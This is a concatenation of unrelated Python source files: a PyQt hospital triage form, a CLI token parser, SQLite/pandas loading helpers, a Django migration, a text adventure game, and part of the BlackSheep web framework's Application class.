    self.labelCoordenador.setText(_translate("FichaAmbulatorialVerso", "Coordenador (a):"))
    self.radioButtonDestinoPSF.setText(_translate("FichaAmbulatorialVerso", "PSF"))
    self.labelDiscriminador.setText(_translate("FichaAmbulatorialVerso", "Discriminador: "))
    self.labelClassificacaoRisco.setText(_translate("FichaAmbulatorialVerso", "CLASSIFICAÇÃO DE RISCO"))
    self.radioButtonDestinoConsultorio.setText(_translate("FichaAmbulatorialVerso", "Consultório"))
    self.radioAmarela.setText(_translate("FichaAmbulatorialVerso", "Amarelo"))
    self.labelEnfermeiro.setText(_translate("FichaAmbulatorialVerso", "Enfermeiro (a):"))
    self.labelFluxograma.setText(_translate("FichaAmbulatorialVerso", "Fluxograma: "))
    self.labelGlasgow.setText(_translate("FichaAmbulatorialVerso", "Glasglow:"))
    self.labelFC.setText(_translate("FichaAmbulatorialVerso", "FC:"))
    self.radioLaranja.setText(_translate("FichaAmbulatorialVerso", "Laranja"))
    self.labelGlicemia.setText(_translate("FichaAmbulatorialVerso", "Glicemia:"))
    self.radioButtonVermelha.setText(_translate("FichaAmbulatorialVerso", "Vermelha"))
    self.labelCoren.setText(_translate("FichaAmbulatorialVerso", "COREN:"))
    self.labelSituacaoQueixa.setText(_translate("FichaAmbulatorialVerso", "Situação/Queixa: "))
    self.labelData_2.setText(_translate("FichaAmbulatorialVerso", "Data:"))
    self.radioButtonDestinoAmbulatorio.setText(_translate("FichaAmbulatorialVerso", "Ambulatório"))
    self.labelGrauDor.setText(_translate("FichaAmbulatorialVerso", "Grau Dor:"))
    self.labelCor.setText(_translate("FichaAmbulatorialVerso", "Cor:"))
    self.labelHoraFim.setText(_translate("FichaAmbulatorialVerso", "Horas: "))
    # Hospital header / letterhead widgets.
    self.labelSubTitulo.setText(_translate("FichaAmbulatorialVerso", "ACOLHIMENTO COM CLASSIFICAÇÃO DE RISCO - SISTEMA DE MANCHESTER"))
    self.labelTitulo.setText(_translate("FichaAmbulatorialVerso", "SECRETARIA DE ESTADO DE SAÚDE DE MINAS GERAIS"))
    self.labelCNPJ.setText(_translate("FichaAmbulatorialVerso", "CNPJ: 07.605.010/0001-08"))
    self.labelTelefoneHosital.setText(_translate("FichaAmbulatorialVerso", " Telefone: (33) 3261-3115"))
    self.labelEnderecoHospital.setText(_translate("FichaAmbulatorialVerso", "Rua: Lajão, 93 – Centro– Conselheiro Pena/MG -"))
    self.labelAssociacao.setText(_translate("FichaAmbulatorialVerso", "Associação Prefeito Hélcio Valentim de Andrade"))
    # Patient-identification widgets.
    self.labelEndereco.setText(_translate("FichaAmbulatorialVerso", "ENDEREÇO: "))
    self.labelIdade.setText(_translate("FichaAmbulatorialVerso", "Idade:"))
    self.labelMae.setText(_translate("FichaAmbulatorialVerso", "Mãe:"))
    self.labelEtnia.setText(_translate("FichaAmbulatorialVerso", "Etnia:"))
    self.labelID.setText(_translate("FichaAmbulatorialVerso", "ID:"))
    self.labelCidade.setText(_translate("FichaAmbulatorialVerso", "Cidade:"))
    self.labelData.setText(_translate("FichaAmbulatorialVerso", "Data:"))
    self.labelIndentificacaoPaciente.setText(_translate("FichaAmbulatorialVerso", "IDENTIFICAÇÃO DO PACIENTE"))
    self.labelNumero.setText(_translate("FichaAmbulatorialVerso", "Nº:"))
    self.labelNaturalidade.setText(_translate("FichaAmbulatorialVerso", "Naturalidade:"))
    self.labelBairro.setText(_translate("FichaAmbulatorialVerso", "Bairro:"))
    self.labelLongradouro.setText(_translate("FichaAmbulatorialVerso", "Longradouro:"))
    self.labelNome.setText(_translate("FichaAmbulatorialVerso", "Nome:"))
    self.labelUF.setText(_translate("FichaAmbulatorialVerso", "UF:"))
    self.labelHoraInicio.setText(_translate("FichaAmbulatorialVerso", "Horas: "))
    self.labelRegistro.setText(_translate("FichaAmbulatorialVerso", "Registro:"))
    self.labelProfissao.setText(_translate("FichaAmbulatorialVerso", "Profissão/Ocupação:"))
    self.labelComplemento.setText(_translate("FichaAmbulatorialVerso", "Complemento:"))
if __name__ == "__main__":
    # Manual smoke test: launch this form standalone with a fresh Qt
    # application so the layout/translations can be eyeballed.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    FichaAmbulatorialVerso = QtWidgets.QMainWindow()
    ui = Ui_FichaAmbulatorialVerso()
    ui.setupUi(FichaAmbulatorialVerso)
    FichaAmbulatorialVerso.show()
    # exec_() blocks until the window closes; its return code becomes the
    # process exit status.
    sys.exit(app.exec_())
|
from argv.tokens import split_flag_token
def parse_tokens(tokens):
    """Translate raw CLI token strings into ``(is_flag, value)`` pairs.

    Given::

        ['-f', 'pets.txt', '-v', 'cut', '-cz', '--lost', '--delete=sam', '--', 'lester', 'jack']

    this generator yields::

        (True, 'f'), (False, 'pets.txt'), (True, 'v'), (False, 'cut'),
        (True, 'c'), (True, 'z'), (True, 'lost'), (True, 'delete'),
        (False, 'sam'), (False, 'lester'), (False, 'jack')

    A bare ``--`` terminator makes every remaining token positional.
    Single-pass: ``tokens`` is consumed as an iterator exactly once.

    Todo:
        ensure that 'verbose' in '--verbose -- a b c' is treated as a
        boolean even if not marked as one.
    """
    stream = iter(tokens)
    for token in stream:
        if token == '--':
            # Drain the remaining tokens as plain positionals; since
            # ``stream`` is an iterator the outer loop ends naturally.
            yield from ((False, rest) for rest in stream)
        elif not token.startswith('-'):
            yield False, token
        else:
            # Handles both '--last=man.txt' and '-czf=file.tgz';
            # partition always returns a 3-tuple, separator found or not.
            head, eq, tail = token.partition('=')
            for flag in split_flag_token(head):
                yield True, flag
            if eq:
                # The value half of '--token=value' is passed through as-is.
                yield False, tail
|
from inspect import signature
class Page:
    """A routable page backed by a builder callable.

    Parameters
    ----------
    url: str
        Route path for the page.
    name: str
        Human-readable page name (echoed back by :meth:`as_list`).
    builder: callable
        Produces the page content; may take zero arguments or one
        (the optional request parameter).
    auth_needed:
        Authentication requirement marker, or None for public pages.
    description: str
        Free-text description of the page.
    """

    def __init__(self, url, name, builder, auth_needed=None, description=''):
        self.name = name
        self.url = url
        self.auth_needed = auth_needed
        self.builder = builder
        # Bug fix: ``description`` was accepted but silently discarded.
        self.description = description

    def as_list(self, param=''):
        """Render the page as a dict of name + built content.

        ``param`` is forwarded to the builder only if the builder's
        signature declares at least one parameter.
        """
        def call_builder():
            # Inspect the builder's arity so both zero-arg and one-arg
            # builders are supported transparently.
            if len(signature(self.builder).parameters) > 0:
                return self.builder(param)
            else:
                return self.builder()
        return {
            'name': self.name,
            'content': call_builder()
        }
import os
import sqlite3
import pandas as pd
import numpy as np
from .pybash import get_file_info
def connect_to_db(path):
    """
    Interact with a SQLite database

    Parameters
    ----------
    path: str
        Location of the SQLite database

    Returns
    -------
    conn: Connector
        The SQLite connection object
    curs: Cursor
        The SQLite cursor object

    Raises
    ------
    sqlite3.Error
        If the database cannot be opened.

    Usage
    -----
    conn, curs = connect_to_db("data/raw/foo.db")
    """
    # sqlite3.connect creates the file when it does not exist, so the
    # branch only changes the message shown to the user.
    if os.path.exists(path):
        print("Connecting to Existing DB")
    else:
        print("Initialising new SQLite DB")
    try:
        conn = sqlite3.connect(path)
        curs = conn.cursor()
    except sqlite3.Error:
        # Bug fix: the old bare ``except`` swallowed the error and then
        # ``return conn, curs`` crashed with NameError; report and re-raise
        # so the caller sees the real problem.
        print("An error occured. Please check the file path")
        raise
    return conn, curs
def print_table_names(path_to_db):
    """Print and return the names of tables in a SQLite database."""
    _, cursor = connect_to_db(path_to_db)
    # sqlite_master is the catalogue table; filter down to user tables.
    tables = cursor.execute(
        "SELECT name FROM sqlite_master WHERE type='table'"
    ).fetchall()
    print(tables)
    return tables
def load_file_to_db(path_to_file, path_to_db, table_name, delim):
    """
    Load a text file of any size into a SQLite database

    Small files are imported in one shot; large ones are streamed in ten
    roughly equal chunks to bound memory usage. The size/row thresholds
    come from ``get_file_info`` (units assumed to be MB — TODO confirm).

    Parameters
    ----------
    path_to_file: str
        Location of the text file
    path_to_db: str
        Location of the SQLite db
    table_name: str
        Name of the table to be created in the database
    delim: str
        The delimiter for the text file

    Returns
    -------
    None
    """
    # Bug fix: ``csv`` was referenced below (csv.QUOTE_NONE) but never
    # imported, so every import attempt raised a NameError that the old
    # bare ``except`` silently swallowed.
    import csv

    conn, curs = connect_to_db(path_to_db)
    print("The database at {} contains the following tables.".format(path_to_db))
    print(curs.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall())
    if not os.path.exists(path_to_file):
        print("File not found at {}, please check the path".format(path_to_file))
        return None
    # Hoisted: get_file_info was previously called twice for the same file.
    info = get_file_info(path_to_file)
    size_ = info.get('size')
    rows_ = info.get('rows')
    try:
        # NOTE(review): ``error_bad_lines`` is deprecated/removed in newer
        # pandas; kept for compatibility with the version this project pins.
        # TODO migrate to ``on_bad_lines='skip'`` when pandas is upgraded.
        if size_ < 250:
            print("{} is a small file. Importing directly.".format(path_to_file))
            df_ = pd.read_csv(
                path_to_file,
                sep=delim,
                low_memory=False,
                error_bad_lines=False,
                quoting=csv.QUOTE_NONE
            )
            df_.to_sql(
                name=table_name,
                con=conn,
                index=False,
                if_exists='append'
            )
            print("Done.")
        else:
            print("{} is large. Importing in chunks.".format(path_to_file))
            # Ten chunks regardless of absolute size.
            csize = int(np.ceil(rows_ / 10))
            chunks = pd.read_csv(
                path_to_file,
                sep=delim,
                chunksize=csize,
                error_bad_lines=False,
                low_memory=False,
                quoting=csv.QUOTE_NONE
            )
            for c in chunks:
                c.to_sql(
                    name=table_name,
                    con=conn,
                    index=False,
                    if_exists='append'
                )
            print("Done")
    except Exception as err:
        # Was a bare ``except`` that hid the real cause (including the
        # missing csv import above); keep the best-effort behaviour but
        # report what actually went wrong.
        print("An error occurred while reading the file.")
        print(err)
    return None
|
# Generated by Django 2.0.3 on 2018-04-01 05:28
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial migration for this app: creates the Person table.
    # Auto-generated by Django; migration history should not be rewritten
    # once applied to any database.
    initial = True

    # No prior migrations to depend on.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Person',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=30)),
                # NOTE(review): max_length is meaningless on a BooleanField and
                # is ignored by the schema editor — presumably a leftover from a
                # CharField; confirm against the current model before cleaning up.
                ('confirmacao', models.BooleanField(max_length=3)),
                ('observacoes', models.TextField()),
                ('photo', models.ImageField(blank=True, null=True, upload_to='clients_photos')),
            ],
        ),
    ]
|
import time
import random
from random import randint
# Random scores rolled once at import time. ``storytime`` picks the arc for
# a RANDOM game (see whichstory); ``storytime2`` picks the arc when the
# player retries after giving up (see ending3). Thresholds: >80 -> arc1,
# >40 -> arc2, otherwise arc3.
storytime = random.randint(0, 130)
storytime2 = random.randint(0, 130)
def intro():
    """Greet the player, then route them into the game or an early exit."""
    print("Hello....................")
    time.sleep(2)
    print("Welcome. You are about to engage in the difficult process of decision making. ")
    print("Your choices determine your future. ")
    print(" Indecision is punishable. Mistakes are costly.")
    answer = input("Are you prepared to continue? Y/N\n")
    if answer in ("Y", "y"):
        yourstory()
    elif answer in ("N", "n"):
        ending3()
    elif answer == "IDK":
        # Indecision is punished immediately, no ending screen.
        print("Wrong answer. Goodbye.")
    else:
        ending3()
def arc1():
    """Scary arc: a shack in the woods, a scarred man, and bad choices.

    Reads the player's choices via input() and terminates in one of the
    ending*() screens (or recurses on invalid input).
    """
    arc1dec = ""
    print("Its dark outside. The woods around you move slowly around you in the night sky.")
    print("As you are walking forward you see a large shack. There are no windows and you have no way to know what is inside.")
    print("Suddenly you hear a howl close to you. Something is near.")
    arc1dec = input("The choice is yours. Do you KNOCK or RUN?")
    if arc1dec == "KNOCK" or arc1dec == "Knock" or arc1dec == "knock":
        print("KNOCK")
        time.sleep(2)
        print(".. KNOCK")
        time.sleep(2)
        print(".... knock")
        time.sleep(1)
        print("The last knock cutting off as the door creaks open")
        print("Inside is a dark room with a wooden bed, and a desk and chair with a book on it. Outside the crunching of leaves underfoot")
        print(" grows louder. You rush inside and shut and lock the door behind you. ")
        arc1dec2 = input("Do you HIDE under the bed or READ the book?")
        if arc1dec2 == "HIDE" or arc1dec2 == "Hide" or arc1dec2 == "hide":
            print("""You hide under the bed. You hear the sound of something banging against the door and then all of a sudden
it slams wide open! A scarred man stumbles inside falling down at eye level to you and looks up. He sees you.""")
            ending2()
        elif arc1dec2 == "READ" or arc1dec2 == "Read" or arc1dec2 == "read":
            print("You try and read the book at the table, but the light inside is almost nonexistent and you can hardly see the words")
            print("You sit quietly at the desk, waiting, and hardly breathing. You hear nothing but the echoing silence around you. The")
            print(" very trees outside have gone silent. Your heart thumps in your chest growing louder and louder. You have to do something!")
            arc1dec3 = input("Do you OPEN the door, BARRACADE the door, or try to start a FIRE?")
            if arc1dec3 == "OPEN" or arc1dec3 == "Open" or arc1dec3 == "open":
                print("The overwhelming curiosity takes control of you and you have to know whats outside.")
                print("You open the door to see a man standing in front of the door. Your last thought is ")
                time.sleep(2)
                print("its so cold\n\n\n\n")
                ending2()
            elif arc1dec3 == "BARRACADE" or arc1dec3 == "Barracade" or arc1dec3 == "barracade":
                print("You barracade the door with the desk and chair. Just as you do a large pounding shakes the shack violently.")
                print('"Let me in!" a loud voice shouts from the other side. You frantically reach into your pocket to call for help.')
                print("As you dial 911 into your phone the table bounces off the door with the shock of the door swinging open.")
                print("You scream and back into the shack. A large man stumbles forward into the shack, off balance from the door suddenly")
                print(" opening. You race out of the shack, running as fast as you can away from the shack and the man.")
                ending1()
            elif arc1dec3 == "FIRE" or arc1dec3 == "Fire" or arc1dec3 == "fire":
                print("You break the chair up and push the pieces into the fireplace on the side of the shack. The cobwebs")
                print(" make excellent kindling to start the fire with your trusty lighter. As the light begins to enter the shack")
                print(" you look at the book laying on the table and read.")
                print(" Journal")
                print("On the front cover. You thumb through the pages reading about a man who lost his mother and father when he was a child")
                print(" and how he never forgave them for abandoning him. The man was the reason they died and it left him scarred and unable his new")
                print(" reality. He was driven mad with rage and hatred. Blaming everyone else for their death, he vowed to get his revenge.\n")
                print(" As you finish reading the journal, the door slams open. A scarred man stands in the doorway.")
                ending2()
            else:
                print("Indecision is punishable. Mistakes are costly. You get to try again this time but you might not always be lucky.")
                arc1()
        else:
            print("Indecision is punishable. Mistakes are costly. An intruder breaks through the door and this is the end for you.")
    elif arc1dec == "RUN" or arc1dec == "Run" or arc1dec == "run":
        print("You take off running away from the shack and the noise you heard. The sound of your footsteps crunching")
        print(" against the leaves sends chills down your spine. The howling you heard earlier gets louder and you recognise it for")
        print("What it is. Someone screaming in the night. Begging for help. ")
        dec4 = input("Do you HELP or HIDE or RUN?")
        if dec4 == "HELP" or dec4 == "Help" or dec4 == "help":
            print("You turn and search for the source of the noise. You rush towards it, but loose your footing and fall, twisting your ankle.")
            print(" As you cry out in pain, a dark figure walks out from behind a tree. Its a scarred man.")
            print(" You don't say a word. Just watch, frozen in terror as he walks towards you.\n\n\n\n")
            ending2()
        elif dec4 == "HIDE" or dec4 == "Hide" or dec4 == "hide":
            print("You hide behind a tree. As you hide there you see a scarred man walking. He stops and cries out for help.")
            print("You stop and hold your breath wondering if he sees you. ")
            dec5 = input("Do you RUN or HIDE?")
            if dec5 == "RUN" or dec5 == "Run" or dec5 == "run":
                print("You run thinking you were spotted. The man sees you run and chases after you. But he's quicker.")
                ending2()
            if dec5 == "HIDE" or dec5 == "Hide" or dec5 == "hide":
                print("You stay silent and don't move. The man stays still and appears to be listening. After a few moments he")
                print("Continues walking. After a hundred feet or so he cries out for help again. You continue watching him for")
                print(" a few minutes til he goes out of sight. Then you quietly run the other way, towards saftey.")
                ending1()
        elif dec4 == "RUN" or dec4 == "Run" or dec4 == "run":
            print("You keep running. You can hear the pounding of someone elses footsteps behind you but it is faint")
            print(" and getting quieter the farther you go. You look over your shoulder and see a scarred man stop chasing you and turn around.")
            print("But All you care about though is how far you can go. You keep running for what feel like hours until you come across a road.")
            print(" You follow the road and see a town in the distance. As you get closer, you hear the rumbling of a truck behind you. ")
            print("You feel a sense of relief until you see the driver. Its the same man that was chasing you. ")
            ending2()
        else:
            print("Try again.")
            arc1()
    # Bug fix: this branch previously compared ``decision`` — a local of
    # intro() that does not exist here — so any unmatched input crashed
    # with NameError instead of reaching the "Try again" path.
    elif arc1dec == "IDK":
        print("Wrong answer. You die.")
    else:
        print("Try again.")
        arc1()
def arc2():
    """Happy arc: a sunny walk with mom, dad, or a friend.

    Reads the player's choices via input(); every branch ends after its
    final print (no ending screen).
    """
    print("The sun is bright and everything is right! You are walking with your....")
    companion = input("MOM DAD FRIEND")
    if companion == "MOM" or companion == "Mom" or companion == "mom":
        print("You are with your mom. While walking on the neighborhood street you come upon an ice cream truck")
        print('Overcome by memories of your childhood, you ask your mom one more time for a ')
        x = input("SPIDERMAN popscicle or a CHOCO taco?")
        if x == "SPIDERMAN" or x == "Spiderman" or x == "spiderman":
            print("You get a Spiderman popscicle, the one with the lemon and strawberry ice cream and bubble gum eyes.")
            print("Life is going simple and great. The sun feels nice out as you eat your ice cream while walking with your mother.")
        elif x == "CHOCO" or x == "Choco" or x == "choco":
            print("""Popsaicles jusat aren't for you anymore. You've progressed onto the finer things of life and want to enjoy
that delectable choco taco. Life is going good and you are on top of the world. As you are walking you see a large dog
in the road. Do you PET him or WALK away? """)
            y = input("PET or WALK")
            if y == "PET" or y == "Pet" or y == "pet":
                print("""You aproach slowly and stick your hand out for him to smell. He sniffs you curiously and nudges closer
and you start petting him. Ice cream and a dog... doesn't get much better. """)
            else:
                print(""" You keep walking and the dog continues on his way. You don't want to risk it, dogs can be scary even if
they do look like clifford. """)
    if companion == "DAD" or companion == "Dad" or companion == "dad":
        print("""You are with your dad. As you are walking he is telling a story about a time you both went ice fishing that you've heard
a million times. do you not say anything and LISTEN or CHANGE the topic? """)
        z = input("LISTEN or CHANGE the topic?")
        if z == "LISTEN" or z == "Listen" or z == "listen":
            print(""" You continue listening patiently as he continues his story. You don't get to see him often anymore and its
nice to hear him so excited. After he finishes his recounting he reaches out and hugs you. He appreciates you listening
and tells you that he knows you've heard it a million times. You feel closer than ever before with your dad. """)
        else:
            print(""" You interrupt him and tell him that you've heard that story a million times. He looks sad but agrees. You feel
guilty for interuppting him when he was getting so excited and suggest you try and find a time to go out and find a new
spot around your college town that you could go fishing. He perks up at this and you both begin planning it out.""")
    # Bug fix: the third comparison was a duplicated "Friend", so a
    # lowercase "friend" answer fell through silently.
    if companion == "FRIEND" or companion == "Friend" or companion == "friend":
        print("""You are with your friend. You're walking down the road after getting lunch at the local taco bellery and hear another friend
call out from a car. "Hey do you guys want a ride?" do you RIDE or WALK """)
        # Bug fix: was ``a == input(...)`` (a comparison against an
        # undefined name), which crashed with NameError before the branch
        # below could run.
        a = input("RIDE or WALK")
        if a == "RIDE" or a == "Ride" or a == "ride":
            print(""" You yell out "Sure!" and hop in their car. Theres only one seat open so your friend has to keep walking. You ride
home and as you get dropped off at your apartment you get a call from your friend and he seems frustrated. You tell him you're sorry
but you didn't want to walk anymore. To make up for it you do all the dishes and take out the trash while you wait. """)
        else:
            print(""" "I'm good, we'll walk!" you yell to the friend in the car. As you continue walking your friend tells you thanks, he only saw
one seat open in his car. As you walk you talk about all the stuff that is going on and how excited you are about an upcoming event
that you didn't think anyone there knew about. You find out that your friend is also interested in it and make plans to get tickets for it!""")
def arc3():
    """Short arc: the player picks the tone of each line of a micro-story.

    First line of three; continues into ss2()/ss3(), or ends via ending3()
    on invalid input.
    """
    print("Lucky you, Sometimes life is simple. Heres a few short stories and you decide how they end!")
    print("Once a 5 year old boy was standing in shallow water.")
    x = input("Next line? HAPPY SAD TWIST\n")
    if x == "HAPPY" or x == "Happy" or x == "happy":
        print("His mother splashed him as they played in the pool")
        ss2()
    elif x == "SAD" or x == "Sad" or x == "sad":
        print("He looked out to the lake, watching as the waves took his ball away")
        ss2()
    # Bug fix: all three comparisons were "TWIST", so "Twist"/"twist"
    # (accepted by every other choice in this game) fell to the else.
    elif x == "TWIST" or x == "Twist" or x == "twist":
        print('He kept repeating the same sentance to the waves. "I can never forgive you for taking away my parents" ')
        ss2()
    else:
        ending3()
def ss2():
    """Second line of the short-story arc; continues into ss3()."""
    print("Everyone goes with the flow… but the one who goes against it becomes someone remarkable.")
    x = input("Next line? HAPPY SAD TWIST\n")
    if x == "HAPPY" or x == "Happy" or x == "happy":
        print("She thought as she prepared for her award acceptance speech.")
        ss3()
    elif x == "SAD" or x == "Sad" or x == "sad":
        print("He thought wishing his ball could go against the flow of the river")
        ss3()
    # Bug fix: all three comparisons were "TWIST"; accept the mixed- and
    # lower-case spellings like every other choice in this game.
    elif x == "TWIST" or x == "Twist" or x == "twist":
        print('Before I could explain this to the traffic police, the man issued me a ticket')
        ss3()
    else:
        ending3()
def ss3():
    """Final line of the short-story arc; the game ends after this choice."""
    print(" The little kid had to stay in jail for quite some time, only to see his home stolen after his release.")
    x = input("Next line? HAPPY SAD TWIST\n")
    if x == "HAPPY" or x == "Happy" or x == "happy":
        print('"You are so dramatic" his mother said after letting him out of time out and seeing his fort knocked over')
    elif x == "SAD" or x == "Sad" or x == "sad":
        print("The bank took everything when he couldn't pay back his debts.")
    # Bug fix: all three comparisons were "TWIST"; accept the mixed- and
    # lower-case spellings like every other choice in this game.
    elif x == "TWIST" or x == "Twist" or x == "twist":
        print('The Monopoly board game got a little tricky at times')
    else:
        ending3()
def ending1():
    """Survival ending: congratulate the player and offer a fresh run."""
    print("Whew! you made it! want to try again?")
    again = input("Y/N?\n")
    if again in ("Y", "y"):
        yourstory()
def ending2():
    """Death ending: offer another attempt at the scary arc."""
    print("Well that was an untimely ending for you! Want to try and live this time?")
    retry = input("Y/N?\n")
    if retry in ("Y", "y"):
        arc1()
def ending3():
    """Quit ending: taunt the player, then optionally restart on a random arc."""
    print("So in the end you give up. How predictable. Maybe if you try again things will turn out differently? ")
    retry = input("Y/N?\n")
    if retry not in ("Y", "y"):
        print("Thanks for playing!")
        return
    # Re-roll uses the second module-level score so a retry can land on a
    # different arc than the original game.
    if storytime2 > 80:
        arc1()
    elif storytime2 > 40:
        arc2()
    else:
        arc3()
def yourstory():
    """Let the player pick an arc by number, or defer to the random picker."""
    mode = input("Would you like to choose your story or go random? CHOOSE or RANDOM\n")
    if mode not in ("CHOOSE", "Choose", "choose"):
        # Anything other than an explicit CHOOSE is treated as random.
        whichstory()
        return
    print("1. Scary, 2. Happy, 3. Short")
    pick = input("1 or 2 or 3?\n")
    arcs = {"1": arc1, "2": arc2, "3": arc3}
    if pick in arcs:
        arcs[pick]()
    else:
        print("Try again")
        yourstory()
def whichstory():
    """Map the module-level random score onto one of the three arcs."""
    # >80 scary, >40 happy, otherwise the short-story arc.
    arc = arc1 if storytime > 80 else arc2 if storytime > 40 else arc3
    arc()
# Starting point: show the rolled score (debug aid), then run the intro.
print (storytime)
intro()
import logging
from typing import (
Any,
Awaitable,
Callable,
List,
Optional,
Tuple,
Type,
Sequence,
)
from guardpost.asynchronous.authentication import AuthenticationStrategy
from guardpost.asynchronous.authorization import AuthorizationStrategy
from guardpost.authorization import Policy, UnauthorizedError
from rodi import Container, Services
from blacksheep.baseapp import BaseApplication
from blacksheep.common.files.asyncfs import FilesHandler
from blacksheep.contents import ASGIContent
from blacksheep.messages import Request, Response
from blacksheep.middlewares import get_middlewares_chain
from blacksheep.scribe import send_asgi_response
from blacksheep.server.authentication import (
AuthenticateChallenge,
get_authentication_middleware,
handle_authentication_challenge,
)
from blacksheep.server.authorization import (
AuthorizationWithoutAuthenticationError,
get_authorization_middleware,
handle_unauthorized,
)
from blacksheep.server.bindings import ControllerParameter
from blacksheep.server.controllers import router as controllers_router
from blacksheep.server.files.dynamic import ServeFilesOptions, serve_files_dynamic
from blacksheep.server.normalization import normalize_handler, normalize_middleware
from blacksheep.server.resources import get_resource_file_content
from blacksheep.server.routing import RegisteredRoute, Router, RoutesRegistry
from blacksheep.utils import ensure_bytes, join_fragments
__all__ = ("Application",)
def get_default_headers_middleware(
    headers: Sequence[Tuple[str, str]],
) -> Callable[..., Awaitable[Response]]:
    """Build a middleware that adds the given default headers to every response.

    Header names and values are encoded to bytes once, up front, so the
    per-request work is only the add_header calls.
    """
    encoded_pairs = tuple((key.encode(), val.encode()) for key, val in headers)

    async def default_headers_middleware(
        request: Request, handler: Callable[[Request], Awaitable[Response]]
    ) -> Response:
        response = await handler(request)
        for key, val in encoded_pairs:
            response.add_header(key, val)
        return response

    return default_headers_middleware
class Resources:
    """Holds static resources used by the application (the error page HTML)."""
    def __init__(self, error_page_html: str):
        # HTML template rendered when an unhandled error page is produced
        self.error_page_html = error_page_html
class ApplicationEvent:
    """An observable application event.

    Handlers subscribe with ``+=`` and unsubscribe with ``-=``; firing the
    event awaits every handler in registration order, passing the configured
    context object as first argument.
    """

    def __init__(self, context: Any) -> None:
        self.__handlers: List[Callable[..., Any]] = []
        self.context = context

    def __iadd__(self, handler: Callable[..., Any]) -> "ApplicationEvent":
        """Subscribe a handler to this event."""
        self.__handlers.append(handler)
        return self

    def __isub__(self, handler: Callable[..., Any]) -> "ApplicationEvent":
        """Unsubscribe a previously registered handler."""
        self.__handlers.remove(handler)
        return self

    def __len__(self) -> int:
        return len(self.__handlers)

    async def fire(self, *args: Any, **keywargs: Any) -> None:
        """Await every subscribed handler sequentially."""
        for subscriber in self.__handlers:
            await subscriber(self.context, *args, **keywargs)
class ApplicationStartupError(RuntimeError):
    """Base exception for errors raised while the application starts."""
    ...
class RequiresServiceContainerError(ApplicationStartupError):
    """Raised when ``application.services`` must still be a rodi ``Container``
    (i.e. not yet built into a service provider) for the requested operation.
    """

    def __init__(self, details: str):
        message = (
            f"The application requires services to be a Container "
            f"at this point of execution. Details: {details}"
        )
        super().__init__(message)
        self.details = details
class Application(BaseApplication):
    """
    ASGI application adding dependency injection, authentication and
    authorization strategies, controllers, middlewares, and static file
    serving on top of BaseApplication's request handling.
    """

    def __init__(
        self,
        *,
        router: Optional[Router] = None,
        resources: Optional[Resources] = None,
        services: Optional[Container] = None,
        debug: bool = False,
        show_error_details: bool = False,
    ):
        if router is None:
            router = Router()
        if services is None:
            services = Container()
        super().__init__(show_error_details, router)
        if resources is None:
            resources = Resources(get_resource_file_content("error.html"))
        self.services: Container = services
        self._service_provider: Optional[Services] = None
        self.debug = debug
        self.middlewares: List[Callable[..., Awaitable[Response]]] = []
        self.access_logger = None
        self.logger = None
        self._default_headers: Optional[Tuple[Tuple[str, str], ...]] = None
        self._middlewares_configured = False
        self.resources = resources
        self._authentication_strategy: Optional[AuthenticationStrategy] = None
        self._authorization_strategy: Optional[AuthorizationStrategy] = None
        # Lifecycle events fired by start()/stop().
        self.on_start = ApplicationEvent(self)
        self.after_start = ApplicationEvent(self)
        self.on_stop = ApplicationEvent(self)
        self.started = False
        self.controllers_router: RoutesRegistry = controllers_router
        self.files_handler = FilesHandler()

    @property
    def service_provider(self) -> Services:
        """
        Returns the object that provides services of this application.

        Raises TypeError when accessed before build_services() has run.
        """
        if self._service_provider is None:
            # NOTE(review): "build" should presumably read "built" in this
            # message -- fixing it would change a runtime string, so it is
            # only flagged here.
            raise TypeError("The service provider is not build for this application.")
        return self._service_provider

    @property
    def default_headers(self) -> Optional[Tuple[Tuple[str, str], ...]]:
        """Headers applied to every response by a dedicated middleware."""
        return self._default_headers

    @default_headers.setter
    def default_headers(self, value: Optional[Tuple[Tuple[str, str], ...]]) -> None:
        # Normalise any iterable of pairs to a tuple; falsy values clear it.
        self._default_headers = tuple(value) if value else None

    def use_authentication(
        self, strategy: Optional[AuthenticationStrategy] = None
    ) -> AuthenticationStrategy:
        """
        Configures the authentication strategy for the application; must be
        called before the application starts. Returns the strategy so the
        caller can configure it further.
        """
        if self.started:
            raise RuntimeError(
                "The application is already running, configure authentication "
                "before starting the application"
            )
        if not strategy:
            strategy = AuthenticationStrategy()
        self._authentication_strategy = strategy
        return strategy

    def use_authorization(
        self, strategy: Optional[AuthorizationStrategy] = None
    ) -> AuthorizationStrategy:
        """
        Configures the authorization strategy for the application; must be
        called before the application starts. Also registers exception
        handlers for authentication challenges and unauthorized errors.
        """
        if self.started:
            raise RuntimeError(
                "The application is already running, configure authorization "
                "before starting the application"
            )
        if not strategy:
            strategy = AuthorizationStrategy()
        if strategy.default_policy is None:
            # by default, a default policy is configured with no requirements,
            # meaning that request handlers allow anonymous users, unless
            # specified otherwise
            # this can be modified, by adding a requirement to the default
            # policy
            strategy.default_policy = Policy("default")
        self._authorization_strategy = strategy
        self.exceptions_handlers[
            AuthenticateChallenge
        ] = handle_authentication_challenge
        self.exceptions_handlers[UnauthorizedError] = handle_unauthorized
        return strategy

    def route(
        self, pattern: str, methods: Optional[Sequence[str]] = None
    ) -> Callable[..., Any]:
        """
        Decorator registering the decorated function as request handler for
        the given path pattern and HTTP methods (defaults to ["GET"]).
        """
        if methods is None:
            methods = ["GET"]

        def decorator(f):
            for method in methods:
                self.router.add(method, pattern, f)
            return f

        return decorator

    def serve_files(self, options: ServeFilesOptions):
        """Configures dynamic serving of static files with the given options."""
        serve_files_dynamic(self.router, self.files_handler, options)

    def _apply_middlewares_in_routes(self):
        # Wrap every route handler in the configured middlewares chain.
        for route in self.router:
            route.handler = get_middlewares_chain(self.middlewares, route.handler)

    def _normalize_middlewares(self):
        # Normalize middlewares so they can receive injected services.
        self.middlewares = [
            normalize_middleware(middleware, self.service_provider)
            for middleware in self.middlewares
        ]

    def use_controllers(self):
        """Collects and registers controller types and their routes."""
        # NB: controller types are collected here, and not with
        # Controller.__subclasses__(),
        # to avoid funny bugs in case several Application objects are defined
        # with different controllers; this is the case for example of tests.
        # This sophisticated approach, using metaclassing, dynamic
        # attributes, and calling handlers dynamically
